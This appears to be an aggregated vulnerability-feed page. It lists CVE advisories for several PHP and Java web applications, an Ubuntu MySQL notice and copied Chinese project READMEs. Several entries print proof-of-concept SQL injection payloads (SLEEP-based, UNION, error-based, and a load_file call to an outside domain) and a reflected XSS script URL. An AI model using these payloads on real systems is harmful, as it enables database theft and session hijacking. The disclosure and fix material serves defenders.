SourceCodester Online Pizza Ordering System v1.0 is vulnerable to SQL Injection via the QTY parameter.

**CVE-2023-30092****All Details about CVE-2023-30092**

Software: Online Pizza Ordering System 1.0

Software Link: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html

Vulnerability Type: SQL Injection

Affected Component: QTY Parameter

Impact Denial of Service: True

Impact Code execution : True

Attack Type: Remote

Vendor of Product: Sourcecodester

**Description:**

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. The vulnerability exists in Sourcecodester Online Pizza Ordering System 1.0 in QTY parameter found during updating the cart in AJAX.php endpoint.

The Affected URL where the vulnerable parameter can be found : http://HOST/php-opos/admin/ajax.php?action=update\_cart\_qty

Impact: SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information

**Vulnerability Description:**

The QTY parameter is vulnerable to SQL injection, which allows an attacker to modify the behavior of the application and access data they should not be able to. By submitting a specially crafted payload containing SQL statements, we were able to generate an SQL error message. This indicates that the application is vulnerable to SQL injection attacks.

Reproduction/ exploit Steps: To reproduce this vulnerability:

1.  Navigate to the Online Pizza Ordering System application.
    
2.  Add a few items to the cart.
    
3.  Update the cart by updating the QTY of of item.
    

4.  Intercept the HTTP request send it to the repeater and then add single Quote (\`) to get the sql error in response from server

5.  An SQL error message is displayed, indicating that the application is vulnerable to SQL injection.
    
6.  Insert the mentioned payload in QTY parameter on the above request to confirm that the application is vulnerable to SQL injection.
    

Payload : (CASE WHEN (9603=9603) THEN SLEEP(5) ELSE 9603 END)

7.  To exploit it further, send the above request to SQLmap to exploit database.

CVE-2023-30092: GitHub - nawed20002/CVE-2023-30092

Ubuntu Security Notice 6060-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.33 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. Ubuntu 18.04 LTS has been updated to MySQL 5.7.42. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

    ==========================================================================Ubuntu Security Notice USN-6060-1May 08, 2023mysql-5.7, mysql-8.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in MySQL.Software Description:- mysql-8.0: MySQL database- mysql-5.7: MySQL databaseDetails:Multiple security issues were discovered in MySQL and this update includesnew upstream MySQL versions to fix these issues.MySQL has been updated to 8.0.33 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS,Ubuntu 22.10, and Ubuntu 23.04. Ubuntu 18.04 LTS has been updated to MySQL5.7.42.In addition to security fixes, the updated packages contain bug fixes, newfeatures, and possibly incompatible changes.Please see the following for more information:https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-42.htmlhttps://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-33.htmlhttps://www.oracle.com/security-alerts/cpuapr2023.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   mysql-server-8.0                8.0.33-0ubuntu0.23.04.1Ubuntu 22.10:   mysql-server-8.0                8.0.33-0ubuntu0.22.10.1Ubuntu 22.04 LTS:   mysql-server-8.0                8.0.33-0ubuntu0.22.04.1Ubuntu 20.04 LTS:   mysql-server-8.0                8.0.33-0ubuntu0.20.04.1Ubuntu 18.04 LTS:   mysql-server-5.7                5.7.42-0ubuntu0.18.04.1This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:   https://ubuntu.com/security/notices/USN-6060-1   CVE-2023-21911, CVE-2023-21912, CVE-2023-21919, CVE-2023-21920,   CVE-2023-21929, CVE-2023-21933, CVE-2023-21935, CVE-2023-21940,   CVE-2023-21945, CVE-2023-21946, CVE-2023-21947, CVE-2023-21953,   CVE-2023-21955, CVE-2023-21962, CVE-2023-21966, CVE-2023-21972,   CVE-2023-21976, CVE-2023-21977, CVE-2023-21980, CVE-2023-21982Package Information:   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.33-0ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.33-0ubuntu0.22.10.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.33-0ubuntu0.22.04.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.33-0ubuntu0.20.04.1   https://launchpad.net/ubuntu/+source/mysql-5.7/5.7.42-0ubuntu0.18.04.1

Ubuntu Security Notice USN-6060-1

BlogMagz CMS version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : techrobot.in                                                               ││  Vendor   : Tech Robot                                                                 ││  Software : BlogMagz CMS 1.0                                                           ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'q' is vulnerable to RXSShttps://website/blogmagz/search?q=123rto10%3cscript%3ealert(1)%3c%2fscript%3efffyz[-] Done

BlogMagz CMS 1.0 Cross Site Scripting

Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Found Information System 1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 05.07.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `cid` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('%5c%5c%5c%5c446j46zi440491hdrco5ywxzhttps://www.sourcecodester.com/user/257130/activity%5c%5coca'))+'was submitted in the cid parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get susceptible - sensitive information about thesystem, then he can perform another more dangerous attack.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: cid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: page=items&cid=-9014' OR 4485=4485 AND 'MLAS'='MLAS    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: page=items&cid=-3437' OR 1 GROUP BYCONCAT(0x71786b7171,(SELECT (CASE WHEN (5811=5811) THEN 1 ELSE 0END)),0x71627a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=items&cid=2'+(selectload_file('\\\\446j46zi440491hdrco5ywxzhttps://www.sourcecodester.com/user/257130/activity\\oca'))+''AND (SELECT 9471 FROM (SELECT(SLEEP(3)))atkh) AND 'RWRl'='RWRl    Type: UNION query    Title: MySQL UNION query (UTF8) - 5 columns    Payload: page=items&cid=2'+(selectload_file('\\\\446j46zi440491hdrco5ywxzhttps://www.sourcecodester.com/user/257130/activity\\oca'))+''UNION ALL SELECT'UTF8',CONCAT(0x71786b7171,0x506f70715a457a794d7641625051436b4c4a52576d51645242665863795a6f594d4843426d654b46,0x71627a6b71),'UTF8','UTF8','UTF8','UTF8'#---```## Proof and Exploit:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Lost-and-Found-Information-1.0)## Time spend:00:37:00

Found Information System 1.0 SQL Injection

Cross Site Request Forgery (CSRF) vulnerability in FlyCms 1.0 allows attackers to add arbitrary administrator accounts via system/admin/admin_save.

**项目说明**

FlyCms 是一个类似知乎以问答为基础的完全开源的JAVA语言开发的社交网络建站程序，基于 Spring Boot+Bootstrap3+MyBatis+MYSQL+Solr+Ehcache 应用架构，专注于社区内容的整理、归类和检索，它集合了问答，digg，wiki 等多个程序的优点，帮助用户轻松搭建专业的知识库和在线问答社区。 业务模块包括：权限管理，会员管理，角色管理，定时任务管理（调度管理），问答管理，文章管理，分享管理，短信接口管理和邮件系统发送（注册、找回密码、邮件订阅），跨域登录，消息推送，全文检索、前端国际化等等众多模块等您自己来体验！

**开放源码，便捷开发**

基于Spring Boot版本开发，利用成熟开发技术，开放系统源码和开发文档，让二次开发更容易。

**弹性设计，任性定制**

UI设计简约又灵活， Bootstrap定制模板让用户自由发挥，让自己的社区更具独特个性。

**管理后台，轻松掌控**

管理后台功能实用简约，只需轻点功能开关，即可完成系统配置，属于你的知识社区一挥而就。

**轻快智能，更懂社交**

FlyCms比论坛更开放，比资讯网站更了解用户，以用户为中心，更懂社交，更注重内容的分析和分享。

**用戶互助，精准推送**

用户之间相互解答，分享产品使用心得，只向用户推送自己关心的消息，扩大价值，压缩干扰。

> 使用说明：请保留页面底部的 _powered by 97560. com_ 感谢支持

在线地址: 97560.com

**技术栈**

*   JDK8
*   Spring-Boot
*   MyBatis
*   Freemarker
*   MySQL
*   Bootstrap3
*   Solr
*   Quartz
*   i18n
*   Ehcache

**特性**

*   社区兼容性（IE9+）
*   页面自适应布局
*   本地登录，手机注册, 邮件注册
*   登录时有验证码，尝试登录次数的限制
*   使用 Spring-Boot 开发
*   MyBatis操作数据库
*   目前sql语句只支持MySQL，如果要切换数据库，需要手动修改代码
*   Solr提供搜索和前台部分页面列表查询和分页

**网站功能****前台功能**

*   问答栏目，用户可发布奖励积分邀请回答问题
*   答案发布管理统计等等；
*   文章栏目，专家专栏，后台设置专家组可发布专业性文章资讯
*   文章栏目可分类，文章栏目目前可无限极分类
*   分享栏目，用户可分享发布如百度网盘资源地址，电影地址等等，赚取积分
*   各个栏目话题聚合内容，话题可编辑删除，审核；
*   用户个人首页，可查看自己关注的用户和自己发布的内容
*   用户内容收藏
*   用户积分管理充值
*   用户绑定手机号码
*   用户绑定邮箱地址
*   用户密码找回
*   用户手机号码注册，需后台绑定运营商API；
*   用户邀请注册奖励

**网站后台**

*   网站运营基本信息编辑
*   用户注册相关信息管理
*   用户手机运营商信息管理（目前只支持阿里大鱼）
*   网站发送邮箱绑定，邮箱模板设置
*   会员信息管理、审核
*   问答管理
*   答案管理
*   文章管理、文章分类
*   话题管理
*   分享管理
*   友情链接管理
*   积分奖励规则管理
*   违禁关键词、敏感词过滤设置
*   增加定时任务管理，通过后台设置启动、关闭，执行任务日志

**二次开发准备**

1.  开发环境要在IDE里装上lombok插件，否则编译器会报错
2.  程序部署建议使用Maven的assembly插件实现自定义打包方式
3.  项目已经接入了solr，程序安装需要先运行solr，solr已调试好，可直接启动，使用方法可访问官网查看；
4.  项目用到了阿里大于jar包，Maven时无法使用，可以下载doc/dysmsapi.zip，然后放本地的Maven的.m2\\repository\\com\\alibaba\\aliyun\\目录下
5.  搜索和首页列表后期大部分前台列表准备都使用solr，所以要先下载目录下的solr，然后运行后启动程序，不然报错！

**solr原来的目录里上传的时候jar文件无法上传，压缩后提示上传文件不能大于10MB****如果需要的话进群空间下载，QQ群：211378508****Windows下solr启动**

*   比如solr放E:/盘下面，首先打开CMD窗口
*   e: 回车
*   cd e:/solr/bin 回车
*   solr start -p 8983 回车，等待启动成功
*   solr stop -p 8983 这个是停止solr命令

**Linux下启动**

*   cd /root/webapp/solr
    
*   ./bin/solr start -p 8983 -force 回车，等待启动成功
    
*   ./bin/solr stop -p 8983 -force 这个是停止solr命令
    
*   创建数据库pybbs, 字符集utf8，如果想支持emoji，就要选择utf8mb4字符集（仅限使用MySQL数据库）
    
*   git clone https://gitee.com/could/FlyCms
    
*   将项目下的 /doc/flycms.sql 文件导入到数据库
    
*   前台页面访问 http://localhost
    
*   后台页面访问 http://localhost/system/login 用户名: flycms 密码: 123456
    

**打包部署开发环境**

*   创建数据库flycms, 字符集utf8，如果想支持emoji，就要选择utf8mb4字符集（仅限使用MySQL数据库）
*   将项目里的application.yml文件复制一份，重新命名application-prod.yml，并修改里面的配置项
*   运行 mvn clean compile package
*   拷贝 target/FlyCms.jar 到你想存放的地方
*   运行 java -jar FlyCms.jar --spring.profiles.active=prod > FlyCms.log 2>&1 & 项目就在后台运行了
*   将项目下的 flycms.sql 文件导入到数据库
*   关闭服务运行 ps -ef | grep FlyCms.jar | grep -v grep | cut -c 9-15 | xargs kill -s 9
*   查看日志运行 tail -200f FlyCms.log

**建议用assembly打包方式****前端标签使用示范**

    <@fly_userpower groupName="技术专家组">  
         <nav class="list-group mt30">  
             <a href="/ucenter/article/add" class="list-group-item active">发布文章</a>  
         </nav>  
    </@fly_userpower>  
    

*   IDEA打包  
    
*   打包后的的文件目录结构，resources目录里只要application.yml一个文件就可以了

**注意事项**

*   由于数据库内容被我清空了，有时候我上传的solr里的数据我可能没清空，导致首页及频道页面查询不到数据会报错，解决方法：运行solr前进入E:\solr\server\solr\info\data 目录下删除里面的三个文件夹即可，后期会增加后台删除功能

**关于主题**

本项目配置的结构目录非常方便主题开发，如果你想适配一套自己喜欢的主题，可以按照 views/templates 目录下的PC或者移动端的文件夹结构开发，然后进入后台设置新加的模板即可。

**反馈**

原来28844.com我转让了，新的演示网站抽个时间给架设上！（http://www.97560.com）

QQ群：211378508

_提问题的时候请将问题重现步骤描述清楚_

**贡献**

欢迎大家提 issues 及 pr

**页面部分演示截图**

     

**捐赠**

 

**如果觉得这个项目对你有帮助，欢迎捐赠！**

**License**

MIT

CVE-2020-36065: GitHub - sunkaifei/FlyCms: FlyCms 是一个类似知乎以问答为基础的完全开源的JAVA语言开发的社交网络建站程序，基于 Spring Boot+Bootstrap3+MyBatis+MySql+Solr +Ehcache应用架构，专注于社区内容的整理、归类和检索，它集合了问答，digg，wiki 等多个程序的优点，帮助用户轻松搭建专业的知识库和在线问答社区。业务模块包括

OS Command injection vulnerability in mblog 3.5.0 allows attackers to execute arbitrary code via crafted theme when it gets selected.

**Mblog 开源Java博客系统, 支持多用户, 支持切换主题**

     

**技术选型：**

*   JDK8
*   MySQL
*   Spring-boot
*   Spring-data-jpa
*   Shiro
*   Lombok
*   Freemarker
*   Bootstrap
*   SeaJs

**启动：**

*   main方法运行

配置：src/main/resources/application-mysql.yml (数据库账号密码)、新建db\_mblog的数据库
运行：src/main/java/com/mtons/mblog/BootApplication
访问：http://localhost:8080/
后台：http://localhost:8080/admin
账号：默认管理员账号为 admin/12345

TIPS: 
如遇到启动失败/切换环境变量后启动失败的,请先maven clean后再尝试启动
IDE得装lombok插件

*   文档: 说明文档
*   官网: 官网地址
*   QQ交流群：378433412

**版本(4.0)更新内容：**

    1. 新增 <@layout.extends name="xxx"></layout.extends> 标签, 用于进入模板文件, 解决主题开发时各种路径带入主题名的问题
    2. 新增 <@layout.block name="header"></layout.block> 标签, 用于模板的占位, 可配合`layout.put`替换指定block区域内容,
    3. 新增 <@layout.put block="contents" type="APPEND"></layout.put> 标签, 用户替换模板内容块, 丢弃freemarker变量传递, 增强主题可维护性
    4. `layout.put`中的type 支持替换类型: APPEND, PREPEND, REPLACE
    5. 调整`default`, `classic`主题, 使用新的主题开发方式
    6. `建议MySQL版本5.7`, 如果不能满足5.7+可自行去除flyway依赖及代码
    

**版本(3.5)更新内容：**

    1. 文件存储目录可配置, 见 site.location, 默认为 user.dir
    2. 支持在${site.location}/storage/templates 目录下扩展自己的主题(${site.location}具体位置见启动日志)
    3. 后台未配置对应第三方登录信息时, 前端不显示对应的按钮
    4. 模板优化
    5. 后台配置主题改为自动从目录中加载
    6. 新增markdown编辑器, 可在后台选择tinymce/markdown
    

**版本(3.0)更新内容：**

    1. 新增开关控制(注册开关, 发文开关, 评论开发)
    2. 后台重写, 替换了所有后台页面功能更完善
    3. 上传图片添加更多支持(本地/又拍云/阿里云/七牛云), 详情见后台系统配置
    4. 升级为spring-boot2
    5. 调整模板静态资源引用,方便扩展
    6. 表名调整, 旧版本升级时请自行在数据库重命名, 详情见change.log
    7. 重写了config(改为options), 可在applicaiton.yaml设置默认配置, 启动后将以options中配置为准
    8. 支持后台设置主题
    9. 去除了本地文件上传目录配置, 改为自动取项目运行目录(会在jar同级目录生成storeage和indexes目录)
    10. 替换表单验证插件, 评论表情改为颜文字
    11. 我的主页和Ta人主页合并
    12. 优化了图片裁剪功能
    13. 支持Docker, 详情见 https://hub.docker.com/r/langhsu/mblog
    14. 邮件服务后台可配
    15. 新增标签页
    16. 新增注册邮箱验证开关(需要手动删除之前的 mto_security_code 表)
    

**图片演示**

 

**扩展主题**

Youth 主题传送门 (作者:小崔崔)(提取码: 25e9)

*   感谢开发主题大佬们的无私奉献

CVE-2021-27280: GitHub - langhsu/mblog: 开源免费的Java博客系统, 采用spring-boot、spring-data-jpa、shiro、freemarker、bootstrap等框架, 支持Docker

The Bitcoin / AltCoin Payment Gateway for WooCommerce & Multivendor store / shop WordPress plugin through 1.7.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users

CVE-2022-4118

SQL Injection vulnerability in victor cms 1.0 allows attackers to execute arbitrary commands via the post parameter to /post.php in a crafted GET request.

Hello, I found a SQL injection vulnerability in the post.php file. The post parameters in this file were not input filtered, and were directly brought into the database for query, which led to the vulnerability.  

poc: post=1 and sleep(2) --  
Delay the program for 2 seconds to query the data  

To fix this vulnerability, you can use prepared statements like this:  
$query = "SELECT \* FROM posts WHERE post\_id = ?";  
$stmt = $sysConnect->prepare($sql);  
$stmt->bind\_param("i", $query);  
$stmt->execute();  
$result=$stmt->fetch();

CVE-2020-23966: SQL Injection vulnerability in post.php · Issue #15 · VictorAlagwu/CMSsite

The Video List Manager WordPress plugin through 1.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

CVE-2023-1408

File upload vulnerability in MCMS 5.0 allows attackers to execute arbitrary code via a crafted thumbnail. A different vulnerability than CVE-2022-31943.

**价值源自分享**

    

铭飞平台 后台演示 前台演示 在线使用手册 腾讯课堂在线视频  
代码生成器视频教程  
Windows一键运行版本\\Linux一键运行版本 Docker体验

一直在改变，从未停止过！  
QQ交流群号：     

**开源说明**

*   系统100%开源
*   模块化开发模式，铭飞所开发的模块都发布到了maven中央库。 可以通过pom.xml文件的方式拉取源代码

    <dependency>
    	<groupId>net.mingsoft</groupId>
    	<artifactId>模块</artifactId>
    	<version>版本号</version>
    	<classifier>sources</classifier>
    	<scope>provided</scope>
    </dependency>
    

**商用**

基于MIT开源协议，可直接商用无需授权，但请尊重开源精神不要去掉代码中铭飞的注释和版权信息

**特点**

*   免费完整开源：基于MIT协议，源代码完全开源，无商业限制,MS开发团队承诺将MCMS内容系统永久完整开源；  
    
*   标签化建站：不需要专业的后台开发技能，只要使用系统提供的标签，就能轻松建设网站；  
    
*   html静态化：系统支持全站静态化；  
    
*   跨终端：站点同时支持PC与移动端访问，同时会自动根据访问的终端切换到对应的界面，数据由系统统一管理；  
    
*   海量模版：铭飞通过MStore（MS商城）分享更多免费、精美的企业网站模版，降低建站成本；  
    
*   丰富插件：为了让MCms适应更多的业务场景，在MStore用户可以下载对应的插件，如：站群插件、微信插件、商城插件等；  
    
*   每月更新：铭飞团队承诺每月28日为系统升级日，分享更多好用等模版与插件；  
    
*   文档丰富：为了让用户更快速的使用MCms系统进行开发，铭飞团队持续更新开发相关文档，如标签文档、使用文档、视频教程等；  
    

**面向对象**

*   企 业：帮助创立初期的公司或团队快速搭建产品的技术平台，加快公司项目开发进度；
*   开发者：帮助开发者快速完成承接外包的项目，避免从零搭建系统；
*   学习者：初学JAVA的同学可以下载源代码来进行学习交流；

**开发环境**

建议开发者使用以下环境，这样避免版本带来的问题

*   Windows、Linux
*   Eclipse、Idea
*   Mysql≧5.7 (开启忽略大小写)
*   JDK≧8
*   Tomcat≧8

**快速体验（导入到 Eclipse 或 IDEA）**

1、检出源代码： git clone https://gitee.com/mingSoft/MCMS.git  
2、导入项目  

*   Eclipse导入，菜单 File -> Import，然后选择 Maven -> Existing Maven Projects，点击 Next> 按钮，选择检出的项目MCMS文件夹，然后点击 Finish 按钮，即可成功导入
*   IDEA导入，点击 Import Project，选择 pom.xml 文件，点击 Next 按钮，选择 Import Maven projects automatically 复选框，然后一直点击 Next 按钮，直到点击 Finish 按钮，即可成功导入  
    

4、Eclipse（IDEA）会自动加载 Maven 依赖包，初次加载会比较慢（根据自身网络情况而定），若工程上有小叉号，请打开 Problems 窗口，查看具体错误内容，直到无错误为止  
5、创建数据库mcms（数据库使用utf-8编码），导入doc/mcms-版本号.sql，如果升级现有系统请使用＊-up-\*.sql升级，如果导入了系统对应的完整版SQL，sql升级补丁不需要重复导入；  
6、修改src\\main\\resources\\application-dev.yml文件中的数据库设置参数；  
7、运行MSApplication.java main方法  
8、首先先访问后台地址：http://localhost:8080/ms/login.do，管理员账号，用户名：msopen 密码：msopen，进入后台点击内容管理->静态化菜单，进行"生成主页"，"生成栏目","生成文章"操作一遍 （注意！！！是后台登录界面，不是会员中心登录界面）

**快速体验（docker）**

    docker run -p 3306:3306 -p 8080:8080 --name mcms --privileged=true -e TZ=Asia/Shanghai  \
    --restart=always -e MYSQL_ROOT_PASSWORD=123456 -d mingsoft/mcms \
    --sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" \
    --lower-case-table-names=1 \
    --query-cache-type=1 \
    --query-cache-size=600000 \
    --max-connections=1000
    
    

MYSQL_ROOT_PASSWORD 数据库密码，如果修改需要修改容器 /home/mcms/config/ 下配置文件的链接，实际部署可以将 /home/mcms 挂载到外部文件夹，方便更新 mcms 系统文件

**技术选型****后端框架**

技术

名称

官网

Spring Framework

容器

http://projects.spring.io/spring-framework

Spring Boot

MVC

https://spring.io/projects/spring-boot

Apache Shiro

安全

http://shiro.apache.org

Spring session

分布式Session管理

http://projects.spring.io/spring-session

MyBatis

DAO

http://www.mybatis.org

MyBatis-Plus

ORM

https://baomidou.com/

Freemarker

视图

http://freemarker.foofun.cn

PageHelper

MyBatis分页插件

http://git.oschina.net/free/Mybatis\_PageHelper

Log4J

日志组件

http://logging.apache.org

Maven

项目构建

http://maven.apache.org

Elasticsearch

分布式搜索引擎

https://www.elastic.co

Redis

分布式缓存数据库

https://redis.io

hutool

工具类

http://hutool.mydoc.io

**前端框架**

技术

名称

官网

VUE

MVVM框架

https://cn.vuejs.org//

Element UI

UI库

https://element.eleme.cn/2.0/#/zh-CN

jQuery

函式库

http://jquery.com/

Waves

点击效果插件

https://github.com/fians/Waves/

validator

验证库

https://github.com/chriso/validator.js

animate

动画

http://daneden.github.io/animate.css/

icon

矢量小图标(待更新)

https://www.iconfont.cn/

**文件说明**

*   doc 项目文档文件夹，里面有数据库文件
*   src/main/java java源代码
*   src/main/resources 项目的资源配置文件
*   src/main/webapp
*   src/main/webapp/static 静态资源文件，如：js、css、image、等第三方前端插件库
*   src/main/webapp/html 生成的静态页面，实际项目需要删除，只是提供给开发者快速预览生成后的静态页面
*   src/main/webapp/templet 模版文件夹
*   src/main/webapp/upload 上传资源文件夹
*   src/main/webapp/WEB-INF/manager 后端视图页面
*   LICENSE 项目协议说明
*   README.md 项目说明文档
*   pom.xml 依赖配置文件

**文档**

*   使用手册 http://doc.mingsoft.net/mcms/
*   插件手册 http://doc.mingsoft.net/plugs/

**关于版本说明 更多版本查看**

1.  开源版本永久免费发布源代码，开发者、企业可以终身免费使用，每个月团队会收集开源系统的问题并在每月的28号进行更新；
2.  企业版本以上更新频率上更快，功能也比开源版本的要多，同时会根据不同版本提供额外插件，不同版本也会提供不同的人工在线服务（服务时间工作日 9:30-17:30）

**软件截图**

**铭飞平台**

以下功能都可以在平台 https://www.mingsoft.net 上免费使用 做开源我们是业余的，写代码我们是认真的。研发产品的路上我们一直在探索、一直在学习、一直在用心投入，希望能给更多的企业与开发者提供一些更有价值的服务。

**项目管理**

**代码生成器**

**模版插件分享**

价值源自分享，开发者可以再MStore安装分享插件进行分享模版（后续会升级到插件分享），让代码给开发者带来更多的被动收入！

CVE-2020-22755: GitHub - ming-soft/MCMS: 完整开源！Java快速开发平台！基于Spring、SpringMVC、Mybatis架构，MStore提供更多好用的插件与模板（文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等，同时提供上百套免费模板任意选择），价值源自分享！铭飞系统不仅一套简单好用的开源系统、更是一整套优质的开源生态内容体系。铭飞的使命就是降低开发成本提高开发效

Tag

#sql